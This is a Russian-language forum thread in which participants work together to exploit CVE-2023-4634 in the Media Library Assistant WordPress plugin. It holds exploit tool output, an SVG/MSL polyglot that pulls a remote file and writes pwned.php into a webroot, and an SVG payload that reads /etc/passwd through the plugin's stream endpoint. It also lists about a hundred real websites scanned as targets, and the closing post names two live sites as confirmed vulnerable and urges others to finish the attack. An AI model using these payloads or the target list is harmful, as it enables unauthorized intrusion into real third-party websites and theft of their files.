Пришлось поборотся с установкой, код зависим от версии 3.9+ иначе будет улетать в ошибку от grequests. По мимо прочего не хватает pillow. В случае с deb:11 (python3.11*) для корректной установки запускал с флагом Code: python3 -m pip install -r requirements.txt --break-system-packages Поясните за заливку: Code: [-] Checking arguments [-] All arguments for exploiting target are set, beginning the first checks [-] The remote FTP polyglot SVG/MSL file is reachable [-] The remote FTP polyglot SVG/MSL file ending with [0] is reachable [-] A sample remote FTP exploiter VID test file is reachable [-] A sample Remote FTP exploiter VID test file ending with [0] is reachable [-] The remote Exploit PNG/PHP file is reachable [!] All arguments have been checked correctly, lauching exploitation [-] Lauching 100 Threads on long SVG [-] Waiting 5 second for the file to be created [-] Starting Bruteforcing with VID exploiters [-] Checking the drop of pwned.php [!] Not yet, try 1 on 9 ... checking again in 10 seconds [!] Not yet, try 2 on 9 ... checking again in 10 seconds [!] Not yet, try 3 on 9 ... checking again in 10 seconds [!] Not yet, try 4 on 9 ... checking again in 10 seconds [!] Not yet, try 5 on 9 ... checking again in 10 seconds [!] Not yet, try 6 on 9 ... checking again in 10 seconds [!] Not yet, try 7 on 9 ... checking again in 10 seconds [!] Not yet, try 8 on 9 ... checking again in 10 seconds [!] Not yet, try 9 on 9 ... checking again in 10 seconds [!] Exploit has not worked, try by increase concurrency value or use another method Прав на корень не хватает? Крутим старые добрые пути к --exploitname one/way/upload/pwned.php ? UPD: мимо Code: grep exploitname CVE-2023-4634.py '--exploitname', exploitname = args.exploitname if not svg_polyglot_name or not svg_exploiter_names or not remotehttp or not png_polyglot_name or not webserverpath or not exploitname: print(colored("\t\t[x] The --svg_polyglot_name, --svg_exploiter_names, --remotehttp, --png_polyglot_name, --webserverpath and --exploitname options are needed to create the SVG/MSL Polyglot file", "red")) </image>""" % { "remotehttp": remotehttp +"/"+png_polyglot_name , "webserverpath" : webserverpath+"/"+exploitname } elif target and remoteftp and remotehttp and svg_polyglot_name and svg_exploiter_names and png_polyglot_name and exploitname: print(colored("[-] Checking the drop of "+exploitname, "cyan")) target_virus = target+"/"+exploitname upd: непонятно, в poly.svg захардкожен путь: cat remote_ftp/poly.svg Code: <?xml version="1.0" encoding="UTF-8"?> <image> <read filename="http://123.123.123.123:80/virus.png" /> <resize geometry="400x400" /> <write filename="/var/www/html/pwned.php" /> <get width="base-width" height="base-height" /> <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <image xlink:href="http://192.192.192.23:1664/neverExist.svg" height="100" width="100"/> </svg> Ручное поднятие ftp с открытым анонимным пользователем и заливка 2х svg (1.svg + 1.svg[0]) Code: <svg width="500" height="500" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg"> <image xlink:href= "text:/etc/passwd" width="500" height="500" /> </svg> При переходе: Code: http://site/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:2122/1.svg&mla_debug=log&mla_stream_height=500&mla_stream_width=600 Отдает картинку без контента. Те тупо белый фон, как не меняй *height + width Code: --webserverpath WEBSERVERPATH Path of the webserver on the victim server (could be found with the LFI and wp-config file) example: /var/www/html https://github.com/Patrowl/CVE-2023-4634/issues/2 а может и не быть найден, нужно тестить на локалке. Если кто-то реально использует или соберется тестировать, отпишите.
Сегодня вечером на локалке немного тестили, получили странные результаты, завтра будем продолжать. НИПАНЯТНА одним словом, конект к FTP есть а в логах GS ругается. Или нужен специфический SVG или правильные policy для imagemagic еще до конца сам не понял. Дефольтный конфиг Debian 12 не пробился. На парочке рил-таргетов svg отработал, но только рисовалка, прочитать текст через text:/etc/passwd не удалось. Если есть желающие присоединиться к нашим веселым посиделкам хекерским, пишите.
Рисование содержимого фаила поверх картинки при помощи mla_debug ака LFI. Code: ...you can try adding mla_debug=true ... this will display a lot of ugly debug information on the screen... Насколько я понимаю уродливая информация поверх картинки в нашем ключе это как раз отрисовка /etc/passwd Пример на первый взгляд кажется ошибочным: Code: <svg width="500" height="500" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg"> <image xlink:href= "text:/etc/passwd" width="500" height="500" /> </svg> Но именно ошибка дает возможность вывести данные при помощи mla_debug=true, для меня пока осталось непонятным какие зависомости нужно учесть. Очень привередливая бага. Фича: wp-content/plugins/media-library-assistant/readme.txt - дает возможность узнать версию плагина. на данный момент тестировал вывод лога в : Code: = 3.06 = = 2.79 = = 3.04 =
Ну файлики читать мы разобрались, работает. Есть пару моментов но работает. А вот RCE пока что не видели на таргетах. На данный момент даже не ясно почему на некоторых таргетах читалка работает а где-то нет. Подняли локалку, все условия вроде бы как соблюдены, но "читалка" не сработала. Возможно играет роль версии IM или GS.
сотка ресов с разными версиями, уже многие обновились c последнего моего скана. У самого ничего не получилось с этой CVE Code: http://theblemish.com/wp-content/plugins/media-library-assistant/readme.txt http://funnymedianews.com/wp-content/plugins/media-library-assistant/readme.txt http://bonehealthandosteoporosis.org/wp-content/plugins/media-library-assistant/readme.txt http://tabacshop.ch/wp-content/plugins/media-library-assistant/readme.txt http://nmuofficial.com/wp-content/plugins/media-library-assistant/readme.txt http://sirabee.com/wp-content/plugins/media-library-assistant/readme.txt http://hometownhealthcenter.org/wp-content/plugins/media-library-assistant/readme.txt http://aqleeat.com/wp-content/plugins/media-library-assistant/readme.txt http://talkingpointsmemo.com/wp-content/plugins/media-library-assistant/readme.txt http://weltwoche.de/wp-content/plugins/media-library-assistant/readme.txt http://perishablenews.com/wp-content/plugins/media-library-assistant/readme.txt http://cbm.ch/wp-content/plugins/media-library-assistant/readme.txt http://desafio21diassemcarne.com.br/wp-content/plugins/media-library-assistant/readme.txt http://themagicforless.com/wp-content/plugins/media-library-assistant/readme.txt http://catholicnews.com/wp-content/plugins/media-library-assistant/readme.txt http://elberadweg.de/wp-content/plugins/media-library-assistant/readme.txt http://aryan-solutions.com/wp-content/plugins/media-library-assistant/readme.txt http://lightnovelstranslations.com/wp-content/plugins/media-library-assistant/readme.txt http://ame-name.com/wp-content/plugins/media-library-assistant/readme.txt http://arpc.gov.au/wp-content/plugins/media-library-assistant/readme.txt http://brainright.com/wp-content/plugins/media-library-assistant/readme.txt http://figment.live/wp-content/plugins/media-library-assistant/readme.txt http://fpta.pt/wp-content/plugins/media-library-assistant/readme.txt http://tm-consulting.ru/wp-content/plugins/media-library-assistant/readme.txt http://maxlucado.com/wp-content/plugins/media-library-assistant/readme.txt http://plumamazing.com/wp-content/plugins/media-library-assistant/readme.txt http://trolleymuseum.org/wp-content/plugins/media-library-assistant/readme.txt http://grapplersguide.com/wp-content/plugins/media-library-assistant/readme.txt http://inventorysource.com/wp-content/plugins/media-library-assistant/readme.txt http://disneynews.us/wp-content/plugins/media-library-assistant/readme.txt http://militaryscalemodelling.com/wp-content/plugins/media-library-assistant/readme.txt http://infonomics-society.org/wp-content/plugins/media-library-assistant/readme.txt http://croci.net/wp-content/plugins/media-library-assistant/readme.txt http://unexmin.eu/wp-content/plugins/media-library-assistant/readme.txt http://historicjamestowne.org/wp-content/plugins/media-library-assistant/readme.txt http://sis.us/wp-content/plugins/media-library-assistant/readme.txt http://shambhala.org/wp-content/plugins/media-library-assistant/readme.txt http://localpedia.de/wp-content/plugins/media-library-assistant/readme.txt http://phantis.com/wp-content/plugins/media-library-assistant/readme.txt http://vintagelittlelady.com/wp-content/plugins/media-library-assistant/readme.txt http://uka.org.uk/wp-content/plugins/media-library-assistant/readme.txt http://thfoods.com/wp-content/plugins/media-library-assistant/readme.txt http://flingtrainer.com/wp-content/plugins/media-library-assistant/readme.txt http://trulucks.com/wp-content/plugins/media-library-assistant/readme.txt http://cvsu.edu.ph/wp-content/plugins/media-library-assistant/readme.txt http://globalrallycross.com/wp-content/plugins/media-library-assistant/readme.txt http://polkadotwedding.com/wp-content/plugins/media-library-assistant/readme.txt http://yosmart.com/wp-content/plugins/media-library-assistant/readme.txt http://tretavazrast.com/wp-content/plugins/media-library-assistant/readme.txt http://alumni.ucd.ie/wp-content/plugins/media-library-assistant/readme.txt http://research.lifeway.com/wp-content/plugins/media-library-assistant/readme.txt http://ack.ug.edu.pl/wp-content/plugins/media-library-assistant/readme.txt http://library.mwit.ac.th/wp-content/plugins/media-library-assistant/readme.txt http://shop.dtwrestling.com/wp-content/plugins/media-library-assistant/readme.txt http://zip-tokens.com.customers.tigertech.net/wp-content/plugins/media-library-assistant/readme.txt http://elrecanv.vh122.hosterby.com/wp-content/plugins/media-library-assistant/readme.txt http://hotel.rosenthal.de/wp-content/plugins/media-library-assistant/readme.txt http://alumni.pensacolastate.edu/wp-content/plugins/media-library-assistant/readme.txt http://studio.balfour.com/wp-content/plugins/media-library-assistant/readme.txt http://studio-rc.balfour.com/wp-content/plugins/media-library-assistant/readme.txt http://studio-stage.balfour.com/wp-content/plugins/media-library-assistant/readme.txt http://brandstore.wabco-auto.com/wp-content/plugins/media-library-assistant/readme.txt http://shop.transition-news.org/wp-content/plugins/media-library-assistant/readme.txt http://web.csg.org/wp-content/plugins/media-library-assistant/readme.txt http://shop.glciran.com/wp-content/plugins/media-library-assistant/readme.txt http://th.kumonglobal.com/wp-content/plugins/media-library-assistant/readme.txt http://hrc.sfasu.edu/wp-content/plugins/media-library-assistant/readme.txt http://m5.moonideas.com/wp-content/plugins/media-library-assistant/readme.txt http://shop.nwfa.org/wp-content/plugins/media-library-assistant/readme.txt http://elementor.inmak.net/wp-content/plugins/media-library-assistant/readme.txt http://is.fourfaith.com/wp-content/plugins/media-library-assistant/readme.txt http://buk.um.ac.id/wp-content/plugins/media-library-assistant/readme.txt http://library.addu.edu.ph/wp-content/plugins/media-library-assistant/readme.txt http://treasure.ready.jp/wp-content/plugins/media-library-assistant/readme.txt http://centralny.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://bostoncig.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://newhampshire.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://capitalregionny.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://vermont.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://missionlifelineia.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://connecticut.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://southernnewengland.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://newjersey.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://westernny.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://cprblog.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://hudsonvalleyny.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://rochester.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://massachusetts.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://longisland.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://heartofuticagrants.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://nyc.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://maine.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://midatlantic.heart.org/wp-content/plugins/media-library-assistant/readme.txt http://applicants.mta.ac.il/wp-content/plugins/media-library-assistant/readme.txt http://33213.dcpserver.de/wp-content/plugins/media-library-assistant/readme.txt http://library.joshibi.ac.jp/wp-content/plugins/media-library-assistant/readme.txt http://clubcurator.golftec.com/wp-content/plugins/media-library-assistant/readme.txt http://byrne.pinelandsalliance.org/wp-content/plugins/media-library-assistant/readme.txt http://teacherpress.ocps.net/wp-content/plugins/media-library-assistant/readme.txt http://hrlms.ipro.org/wp-content/plugins/media-library-assistant/readme.txt http://nyushi.otaru-uc.ac.jp/wp-content/plugins/media-library-assistant/readme.txt http://netmedia.kanto-gakuin.ac.jp/wp-content/plugins/media-library-assistant/readme.txt http://nasukashi.niye.go.jp/wp-content/plugins/media-library-assistant/readme.txt
для RCE нужен путь тут работает, быстро чекнули, добивай) Code: midatlantic.heart.org clubcurator.golftec.com
